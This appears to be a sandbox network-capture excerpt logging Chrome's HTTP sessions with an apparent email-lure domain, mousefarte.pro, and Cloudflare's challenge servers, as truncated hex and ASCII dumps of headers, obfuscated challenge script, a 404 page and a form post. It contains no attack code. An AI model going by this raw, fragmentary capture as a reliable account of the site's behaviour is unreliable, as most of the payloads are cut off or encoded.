                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:20 UTC301INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:20 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 115564
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5b41a2b43c3-EWR
                                                                                        2024-10-02 15:15:20 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6c 6f 6e 67 65 72 5f 74 68 61 6e 5f 65 78 70 65 63 74 65 64 22 3a 22 25 33 43 61 25 32 30 68 72 65 66 25 33 44 25 32 32 25 32 33 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65
                                                                                        Data Ascii: er-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_refresh":"Refresh","turnstile_longer_than_expected":"%3Ca%20href%3D%22%23%22%20class%3D%22re
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 31 30 35 36 35 37 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 34 39 31 29 5d 2c 65 4f 3d 5b 5d 2c 65 50 3d 30 3b 32 35 36 3e 65 50 3b 65 4f 5b 65 50 5d 3d 53 74 72 69 6e 67 5b 67 49 28 31 38 39 37 29 5d 28 65 50 29 2c 65 50 2b 2b 29 3b 65 51 3d 28 30 2c 65 76 61 6c 29 28 67 49 28 36 36 38 29 29 2c 65 52 3d 61 74 6f 62 28 67 49 28 36 37 33 29 29 2c 66 68 3d 7b 7d 2c 66 68 5b 67 49 28 31 35 39 38 29 5d 3d 27 6f 27 2c 66 68 5b 67 49 28 38 33 38 29 5d 3d 27 73 27 2c 66 68 5b 67 49 28 38 31 30 29 5d 3d 27 75 27 2c 66 68 5b 67 49 28 38 32 33 29 5d 3d
                                                                                        Data Ascii: break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,105657),eM=this||self,eN=eM[gI(1491)],eO=[],eP=0;256>eP;eO[eP]=String[gI(1897)](eP),eP++);eQ=(0,eval)(gI(668)),eR=atob(gI(673)),fh={},fh[gI(1598)]='o',fh[gI(838)]='s',fh[gI(810)]='u',fh[gI(823)]=
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 28 31 36 35 35 29 5d 28 74 68 69 73 2e 68 5b 32 33 34 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 68 28 31 35 36 31 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 33 34 2e 37 39 5d 5b 30 5d 2b 2b 29 2c 32 32 38 29 2b 32 35 36 2c 32 35 35 29 2c 68 21 3d 3d 31 31 39 3f 6f 5b 68 68 28 36 35 34 29 5d 28 31 36 32 2c 69 29 3f 28 4a 3d 48 5e 38 31 2e 37 37 2c 4b 3d 2d 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 28 31 39 30 5e 49 29 5d 29 3a 33 38 3d 3d 3d 6a 3f 28 4a 3d 34 32 2e 38 37 5e 48 2c 4b 3d 2b 74 68 69 73 2e 68 5b 6f 5b 68 68 28 31 31 37 33 29 5d 28 49 5e 31 35 33 2c 74 68 69 73 2e 67 29 5d 29 3a 6f 5b 68 68 28 31 33 31 36 29 5d 28 31 35 30 2c 44 29 3f 28 4a 3d 48 5e 31 38 31 2e 31 37 2c 4b 3d 21 74 68 69 73 2e 68 5b 6f 5b 68 68 28 31 35 32 32 29 5d 28
                                                                                        Data Ascii: (1655)](this.h[234^this.g][1][hh(1561)](this.h[this.g^234.79][0]++),228)+256,255),h!==119?o[hh(654)](162,i)?(J=H^81.77,K=-this.h[this.g^(190^I)]):38===j?(J=42.87^H,K=+this.h[o[hh(1173)](I^153,this.g)]):o[hh(1316)](150,D)?(J=H^181.17,K=!this.h[o[hh(1522)](
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 6b 5b 68 6c 28 31 34 38 33 29 5d 28 27 6f 2e 27 2c 73 29 7d 29 7d 65 6c 73 65 20 6a 5b 68 6b 28 31 30 33 35 29 5d 28 68 6b 28 38 33 34 29 2c 66 75 6e 63 74 69 6f 6e 28 68 6d 29 7b 68 6d 3d 68 6b 2c 6b 5b 6b 5b 68 6d 28 31 37 38 32 29 5d 5d 26 26 6e 5b 6b 5b 68 6d 28 31 37 38 32 29 5d 5d 5b 68 6d 28 31 31 31 36 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 6b 5b 68 6d 28 31 38 32 31 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 6f 5b 68 6d 28 37 32 36 29 5d 5b 68 6d 28 36 39 32 29 5d 2c 27 65 76 65 6e 74 27 3a 6b 5b 68 6d 28 38 37 31 29 5d 2c 27 72 65 61 73 6f 6e 27 3a 68 6d 28 36 30 31 29 7d 2c 27 2a 27 29 7d 29 7d 2c 65 4d 5b 67 49 28 31 32 39 34 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 38 37 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 46 29 7b 69 66 28 68 46 3d 67 49
                                                                                        Data Ascii: k[hl(1483)]('o.',s)})}else j[hk(1035)](hk(834),function(hm){hm=hk,k[k[hm(1782)]]&&n[k[hm(1782)]][hm(1116)]({'source':k[hm(1821)],'widgetId':o[hm(726)][hm(692)],'event':k[hm(871)],'reason':hm(601)},'*')})},eM[gI(1294)]=![],eM[gI(876)]=function(hF){if(hF=gI
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 62 58 4c 59 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 79 44 71 53 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 54 67 4f 50 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 46 71 4c 79 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 64 55 44 47 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4b 5a 4d 75 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 6b 56 54 73 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72
                                                                                        Data Ascii: ion(h,i){return h|i},'bXLYz':function(h,i){return i&h},'yDqSz':function(h,i){return i==h},'TgOPF':function(h,i){return h==i},'FqLyG':function(h,i){return h<i},'dUDGO':function(h,i){return h<<i},'KZMuU':function(h,i){return i&h},'kVTsf':function(h,i){retur
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 7c 28 42 5b 4c 5d 3d 46 2b 2b 2c 43 5b 4c 5d 3d 21 30 29 2c 4d 3d 64 5b 69 61 28 31 38 33 36 29 5d 28 44 2c 4c 29 2c 4f 62 6a 65 63 74 5b 69 61 28 31 30 32 36 29 5d 5b 69 61 28 31 30 35 34 29 5d 5b 69 61 28 31 33 38 31 29 5d 28 42 2c 4d 29 29 44 3d 4d 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 69 61 28 31 30 32 36 29 5d 5b 69 61 28 31 30 35 34 29 5d 5b 69 61 28 31 33 38 31 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 69 61 28 39 38 38 29 5d 3d 3d 3d 69 61 28 35 36 38 29 29 51 3d 7b 7d 2c 51 5b 69 61 28 31 35 30 37 29 5d 3d 69 61 28 31 30 36 31 29 2c 51 5b 69 61 28 31 35 32 36 29 5d 3d 48 5b 69 61 28 37 32 36 29 5d 5b 69 61 28 36 39 32 29 5d 2c 51 5b 69 61 28 31 37 38 31 29 5d 3d 69 61 28 39 36 33 29 2c 51 5b 69 61 28 31 30 39 34 29 5d 3d 69 61 28 35 39
                                                                                        Data Ascii: |(B[L]=F++,C[L]=!0),M=d[ia(1836)](D,L),Object[ia(1026)][ia(1054)][ia(1381)](B,M))D=M;else{if(Object[ia(1026)][ia(1054)][ia(1381)](C,D)){if(d[ia(988)]===ia(568))Q={},Q[ia(1507)]=ia(1061),Q[ia(1526)]=H[ia(726)][ia(692)],Q[ia(1781)]=ia(963),Q[ia(1094)]=ia(59
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 61 28 31 31 36 32 29 5d 28 64 5b 69 61 28 39 30 33 29 5d 28 49 2c 31 29 2c 4e 29 2c 64 5b 69 61 28 39 37 33 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 61 28 31 37 38 30 29 5d 28 64 5b 69 61 28 31 38 32 37 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 61 28 31 35 36 31 29 5d 28 30 29 2c 78 3d 30 3b 31 36 3e 78 3b 49 3d 64 5b 69 61 28 31 38 37 31 29 5d 28 49 3c 3c 31 2c 64 5b 69 61 28 39 38 37 29 5d 28 4e 2c 31 29 29 2c 64 5b 69 61 28 31 31 30 30 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 61 28 31 37 38 30 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29
                                                                                        Data Ascii: );}else{for(N=1,x=0;x<G;I=d[ia(1162)](d[ia(903)](I,1),N),d[ia(973)](J,j-1)?(J=0,H[ia(1780)](d[ia(1827)](o,I)),I=0):J++,N=0,x++);for(N=D[ia(1561)](0),x=0;16>x;I=d[ia(1871)](I<<1,d[ia(987)](N,1)),d[ia(1100)](J,j-1)?(J=0,H[ia(1780)](o(I)),I=0):J++,N>>=1,x++)
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 64 28 31 33 33 38 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 69 64 28 31 34 36 33 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 69 64 28 31 33 36 39 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 69 64 28 38 39 32 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 64 28 31 33 33 38 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 64 5b 69 64 28 31 33 36 39 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d
                                                                                        Data Ascii: itch(J){case 0:for(J=0,K=Math[id(1338)](2,8),F=1;d[id(1463)](F,K);L=d[id(1369)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=(d[id(892)](0,L)?1:0)*F,F<<=1);M=e(J);break;case 1:for(J=0,K=Math[id(1338)](2,16),F=1;F!=K;L=d[id(1369)](G,H),H>>=1,0==H&&(H=j,G=o(I++)),J|=
                                                                                        2024-10-02 15:15:20 UTC1369INData Raw: 39 36 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 2c 69 67 29 7b 69 67 3d 69 65 2c 6a 5e 3d 6c 5b 69 67 28 31 35 36 31 29 5d 28 73 29 7d 29 2c 66 3d 65 4d 5b 69 65 28 31 35 35 34 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 69 65 28 31 35 36 31 29 5d 28 2b 2b 69 29 29 3b 6b 5b 69 65 28 31 37 38 30 29 5d 28 53 74 72 69 6e 67 5b 69 65 28 31 38 39 37 29 5d 28 68 5b 69 65 28 37 33 31 29 5d 28 28 32 35 35 26 6d 29 2d 6a 2d 68 5b 69 65 28 37 33 31 29 5d 28 69 2c 36 35 35 33 35 29 2b 36 35 35 33 35 2c 32 35 35 29 29 29 29 3b 72 65 74 75 72 6e 20 6b 5b 69 65 28 31 30 33 34 29 5d 28 27 27 29 7d 2c 65 4d 5b 67 49 28 31 33 34 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 68 2c 64 2c 65 2c 66 2c 67 29 7b 69 68 3d 67 49
                                                                                        Data Ascii: 96)](/./g,function(n,s,ig){ig=ie,j^=l[ig(1561)](s)}),f=eM[ie(1554)](f),k=[],i=-1;!isNaN(m=f[ie(1561)](++i));k[ie(1780)](String[ie(1897)](h[ie(731)]((255&m)-j-h[ie(731)](i,65535)+65535,255))));return k[ie(1034)]('')},eM[gI(1343)]=function(ih,d,e,f,g){ih=gI


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.449753188.114.96.34433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:20 UTC673OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: mousefarte.pro
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: PHPSESSID=v6pg430j5lmu808i368bg8caoa
                                                                                        2024-10-02 15:15:20 UTC668INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 02 Oct 2024 15:15:20 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        cache-control: private, no-cache, max-age=0
                                                                                        pragma: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        CF-Cache-Status: BYPASS
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I91XYQS%2FYUjETIAuGW4A9K1gWNIznWjLHDgSQHkw4%2BBjcfQxs1PW4sq6WzAZFsNUA7wHXZn2s%2Bz8wBk7kzRXb4Vwe4wOTEW%2FgOrN8UCYZAmM9imFNHIkerVnhCG9U0fMvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5b4296e0cd9-EWR
                                                                                        2024-10-02 15:15:20 UTC701INData Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                                                                                        Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                                                                                        2024-10-02 15:15:20 UTC555INData Raw: 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d
                                                                                        Data Ascii: </h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-
                                                                                        2024-10-02 15:15:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.449756104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:20 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:20 UTC210INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:20 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5b49f0641a1-EWR
                                                                                        2024-10-02 15:15:20 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.449757104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:20 UTC924OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 3088
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: ede8e2645a67d81
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:20 UTC3088OUTData Raw: 76 5f 38 63 63 35 61 35 61 34 37 65 30 36 34 33 65 39 3d 78 31 43 4f 32 4f 4b 4f 31 4f 55 4f 68 73 71 72 73 71 52 4f 73 4e 45 7a 24 59 73 75 71 24 71 77 53 4e 6b 4a 67 71 47 35 36 71 67 67 73 42 71 33 71 70 4e 75 7a 34 67 71 48 71 78 25 32 62 63 7a 35 6f 53 67 69 71 6b 4e 73 55 71 56 67 69 4a 4d 6b 71 41 6c 71 6b 24 71 73 62 71 24 35 4f 71 62 6b 4d 67 45 4a 71 68 55 2d 34 54 35 69 34 6b 67 41 61 71 70 76 62 76 35 71 33 2b 4f 71 69 38 2b 53 79 74 72 71 6b 48 44 37 37 71 47 67 43 67 71 7a 4f 73 53 65 45 47 61 39 32 73 61 35 70 75 33 57 44 7a 30 54 48 4e 42 71 38 61 53 71 62 43 62 73 45 7a 42 71 41 38 6c 71 74 7a 4b 71 73 7a 71 54 35 55 4f 71 35 31 71 54 61 4e 31 4d 76 77 61 37 24 67 71 66 4f 41 46 71 45 38 4a 71 24 37 78 55 67 45 61 71 41 31 62 71 6b 6c 66
                                                                                        Data Ascii: v_8cc5a5a47e0643e9=x1CO2OKO1OUOhsqrsqROsNEz$Ysuq$qwSNkJgqG56qggsBq3qpNuz4gqHqx%2bcz5oSgiqkNsUqVgiJMkqAlqk$qsbq$5OqbkMgEJqhU-4T5i4kgAaqpvbv5q3+Oqi8+SytrqkHD77qGgCgqzOsSeEGa92sa5pu3WDz0THNBq8aSqbCbsEzBqA8lqtzKqszqT5UOq51qTaN1Mvwa7$gqfOAFqE8Jq$7xUgEaqA1bqklf
                                                                                        2024-10-02 15:15:20 UTC717INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:20 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 152108
                                                                                        Connection: close
                                                                                        cf-chl-gen: bfGP/DWW9fXZaiz4abO6OfRgfnn+Kyzb06Eavxl+1SPhfCVx28sNlo8Pi1poPl8VILcXk/iIMcsi/pKw5S87GoOyzJYUDxODPS7dmG/KaR6av/ts41LNpDAxsvEc/3pgjHkSFtxFdWxmttUmbNFIzl7QwCKIk3+TtEQJaxU6F1Wdc7BBECxRGOX80gMlyVbWAvilSQTWVjkhwXJoLduUzGDZvCwlgSZhKSVAwe9pEwPmOprBtV4qJ2s9rYI+/t/7mM9lagW5TvP//3Al4pT2PXkNqWAfKdpBox5l5wRNjiFAmA6dCO8zsldM9DMg/GsCVFJGfRDozpPdTcqq/TNtizpPc+3nEu0cdew83VhoC8ldCEcK+2EtN1RBuHGJeWa8gqCkS04Rg0wtCFYnflRj/NwB+qaAlbftgjb5AK1SJDPHpW/KmpqWGD/DzHMFkb0XsRCEas6vuwyoDVAdtlDbnpiJ5BKyt6vbW5bps+VJQkWoUy0=$7Q/heAIJd5UCf0lU
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5b4dcf1440d-EWR
                                                                                        2024-10-02 15:15:20 UTC652INData Raw: 6d 37 36 41 6b 73 53 6d 69 36 69 6f 76 37 76 48 73 59 6d 53 70 38 32 54 30 39 62 47 30 35 65 38 32 38 75 70 31 37 47 73 32 64 6d 34 77 4e 58 57 35 4b 6e 43 35 2b 58 49 32 63 71 37 75 73 44 6b 38 50 43 78 35 4f 33 6e 36 65 37 51 2f 66 7a 4e 76 73 44 2b 75 74 6a 32 38 4d 43 37 31 73 6e 44 39 65 6b 52 7a 77 48 79 41 4f 41 47 39 76 48 70 43 78 48 34 32 51 6a 56 32 77 4c 77 43 79 50 6a 48 76 62 2b 48 41 59 6f 35 69 55 58 41 77 4d 6c 37 68 30 48 4b 66 50 73 44 77 50 34 4e 69 6b 6d 42 68 34 51 2b 67 6f 69 50 2f 6f 30 46 30 50 2b 4e 30 41 71 53 45 59 64 48 55 45 37 44 46 51 6c 50 6b 63 69 44 30 73 79 54 69 31 53 4e 31 78 59 55 45 30 39 4c 6a 30 79 57 68 74 42 62 47 73 6b 52 44 70 62 52 6d 70 71 5a 58 56 43 61 46 67 76 56 6e 5a 7a 54 58 42 55 58 56 39 38 50 33 5a
